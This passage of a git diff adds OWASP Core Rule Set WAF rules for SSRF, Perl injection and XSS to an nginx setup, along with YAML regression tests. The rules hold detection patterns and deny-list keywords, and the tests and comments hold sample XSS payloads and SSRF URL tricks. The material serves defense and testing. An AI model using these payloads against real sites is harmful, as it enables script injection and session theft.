((?:[0-9a-fA-F]{1,4}:){6}(?:(25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)\.){3,3}(?:25[0-5]|(?:2[0-4]|1{0,1}\d){0,1}\d)) +# http://[::] +# http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ (already covered by RFI rule 931100) +# http://127.88.23.245:22/?@google.com:80/ (already covered by RFI rule 931100) +# http://127.88.23.245:22/#@www.google.com:80/ (already covered by RFI rule 931100) +# http://google.com:80\\@127.88.23.245:22/ (already covered by RFI rule 931100) +# http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ +# http://google.com:80+&@google.com:80#+@127.88.23.245:22/ +# +# Regular expression generated from regex-assembly/934120.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934120 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)((?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[0-9]{10}|(?:0x[0-9a-f]{2}\.){3}0x[0-9a-f]{2}|0x(?:[0-9a-f]{8}|[0-9a-f]{16})|(?:0{1,4}[0-9]{1,3}\.){3}0{1,4}[0-9]{1,3}|[0-9]{1,3}\.(?:[0-9]{1,3}\.[0-9]{5}|[0-9]{8})|(?:\x5c\x5c[\-0-9a-z]\.?_?)+|\[[0-:a-f]+(?:[\.0-9]+|%[0-9A-Z_a-z]+)?\]|[a-z][\--\.0-9A-Z_a-z]{1,255}:[0-9]{1,5}(?:#?[\s\v]*&?@(?:(?:[0-9]{1,3}\.){3}[0-9]{1,3}|[a-z][\--\.0-9A-Z_a-z]{1,255}):[0-9]{1,5}/?)+|[\.0-9]{0,11}(?:\xe2(?:\x91[\xa0-\xbf]|\x92[\x80-\xbf]|\x93[\x80-\xa9\xab-\xbf])|\xe3\x80\x82)+))" \ + "id:934120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Server Side Request Forgery (SSRF) Attack: URL Parameter using IP Address',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-ssrf',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/225/664',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Perl generic RCE signatures ] +# +# Detects Perl-based injection attacks. +# Example: @{[system whoami]} +# +# Regular expression generated from regex-assembly/934140.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 934140 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx @\{.*\}" \ + "id:934140,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Perl Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-perl',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-generic',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-GENERIC" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-934-APPLICATION-ATTACK-GENERIC" diff --git a/nginx/config/owasp-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/nginx/config/owasp-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf new file mode 100644 index 00000000..22244e3c --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf @@ -0,0 +1,1070 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + + +# In CRS v4.0, we have added REQUEST_FILENAME to the list of variables to +# be checked for XSS to catch path-based XSS exploits such as: +# /index.php/%3Csvg/onload=alert() +# +# However, the REQUEST_FILENAME is always populated (while ARGS etc. are +# only set on some requests) and we found that always checking the +# REQUEST_FILENAME has a significant performance impact. +# Therefore, we are disabling the REQUEST_FILENAME XSS checks when the +# REQUEST_FILENAME is clearly not containing special characters necessary +# for a successful XSS. +# +# Some bona-fide REQUEST_FILENAMEs will still contain special characters +# and will be checked by the rules, but it will be a much lower amount, +# and that is a trade-off we are willing to make. +# +# So, we check for XSS in REQUEST_FILENAME only if it contains +# other characters than alphanumeric characters, hyphens, underscores etc. +# typically found in filenames and paths: +# +# - ascii 20 (whitespace) +# - ascii 45-47 (- . /) +# - ascii 48-57 (0-9) +# - ascii 65-90 (A-Z) +# - ascii 95 (underscore) +# - ascii 97-122 (a-z) +# +# If just these characters are present, we make use of a special tag to remove +# REQUEST_FILENAME from the target list of all the 941xxx rules starting 941100. +# +# Please note that it would be preferable to start without REQUEST_FILENAME in the +# target list and to add it on a case to case base, but the rule language does not +# support this feature at runtime. +# +SecRule REQUEST_FILENAME "!@validateByteRange 20, 45-47, 48-57, 65-90, 95, 97-122" \ + "id:941010,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=xss-perf-disable;REQUEST_FILENAME" + + +# +# -=[ Libinjection - XSS Detection ]=- +# +# Ref: https://github.com/client9/libinjection +# Ref: https://speakerdeck.com/ngalbreath/libinjection-from-sqli-to-xss +# +# -=[ Targets ]=- +# +# 941100: PL1 : REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/| +# REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent| +# ARGS_NAMES|ARGS|XML:/* +# +# 941101: PL2 : REQUEST_FILENAME|REQUEST_HEADERS:Referer +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \ + "id:941100,\ + phase:2,\ + block,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Attack Detected via libinjection',\ + logdata:'Matched Data: XSS data found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 1 ]=- +# http://xssplayground.net23.net/xssfilter.html +# script tag based XSS vectors, e.g., +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ + "id:941110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 1: Script Tag Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 3 ]=- +# +# Regular expression generated from regex-assembly/941130.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941130 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i).(?:\b(?:x(?:link:href|html|mlns)|data:text/html|formaction|pattern\b.*?=)|!ENTITY[\s\v]+(?:%[\s\v]+)?[^\s\v]+[\s\v]+(?:SYSTEM|PUBLIC)|@import|;base64)\b" \ + "id:941130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 3: Attribute Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 4 ]=- +# XSS vectors making use of javascript uri and tags, e.g.,

+# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#css-expressions-ie7 +# https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#behaviors-for-older-modes-of-ie +# examples: https://regex101.com/r/FFEpsh/1 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[a-z]+=(?:[^:=]+:.+;)*?[^:=]+:url\(javascript" \ + "id:941140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,t:removeWhitespace,\ + msg:'XSS Filter - Category 4: Javascript URI Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ NoScript XSS Filters ]=- +# Ref: http://noscript.net/ +# +# [NoScript InjectionChecker] HTML injection +# +# Regular expression generated from regex-assembly/941160.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 941160 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)<[^0-9<>A-Z_a-z]*(?:[^\s\v\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\v/]|[\"'](?:.*[\s\v/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:scriptexecu|upda)te)|lerting|n(?:imation(?:cancel|end|iteration|start)|tennastatechange)|ppcommand|u(?:dio(?:end|process|start)|xclick))|b(?:e(?:fore(?:(?:(?:(?:de)?activa|scriptexecu)t|toggl)e|c(?:opy|ut)|editfocus|input|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input))|ullscreenchange)|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hide|show)|int|(?:st|us)e)|lay(?:ing)?|o(?:inter(?:down|enter|(?:(?:lea|mo)v|rawupdat)e|o(?:ut|ver)|up)|p(?:state|up(?:hid(?:den|ing)|show(?:ing|n))))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll(?:end)?|e(?:arch|ek(?:complete|ed|ing)|lect(?:ionchange|start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|o(?:ggle|uch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start))|ransition(?:cancel|end|run|start))|u(?:n(?:derflow|handledrejection|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|ebkit(?:animation(?:end|iteration|start)|transitionend)|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f-\r ]*?=" \ + "id:941160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: HTML Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [NoScript InjectionChecker] Attributes injection +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\x5c\(\[\.<]|[\s\S]*?(?:\bname\b|\x5c[ux]\d))|data:(?:(?:[a-z]\w+/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|[^-]*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[^:]*?:\W*?u\W*?r\W*?l[\s\S]*?\(" \ + "id:941170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: Attribute Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [Deny List Keywords from Node-Validator] +# https://github.com/validatorjs/validator.js/ +# This rule has a stricter sibling 941181 (PL2) that covers the additional payload "-->" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@pm document.cookie document.domain document.write .parentnode .innerhtml window.location -moz-binding " \ + "id:941181,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:lowercase,t:removeNulls,\ + msg:'Node-Validator Deny List Keywords',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# -=[ XSS Filters from IE ]=- + +# Detect tags that are the most common direct HTML injection points. +# +# +# +# +# " + output: + log_contains: id "941330" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml new file mode 100644 index 00000000..44f60d45 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 941340.yaml +tests: + - test_title: 941340-1 + desc: "IE XSS Filters - Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941340" + - test_title: 941340-2 + desc: "XSS test based on portswigger XSS cheatsheet" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "payload=XSS" + version: HTTP/1.0 + output: + log_contains: id "941340" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml new file mode 100644 index 00000000..75721a2a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: fgsch + enabled: true + name: 941350.yaml + description: Test rule 941350 +tests: + - test_title: 941350-1 + desc: GH issue 1514 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: /xx?id=%252bADw-script%252bAD4- + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + output: + log_contains: id "941350" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml new file mode 100644 index 00000000..3f2e77f3 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -0,0 +1,58 @@ +--- +meta: + author: "Christian Folini" + description: None + enabled: true + name: 941360.yaml +tests: + - test_title: 941360-1 + desc: "JSFuck / Hieroglyphy payload obfuscation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 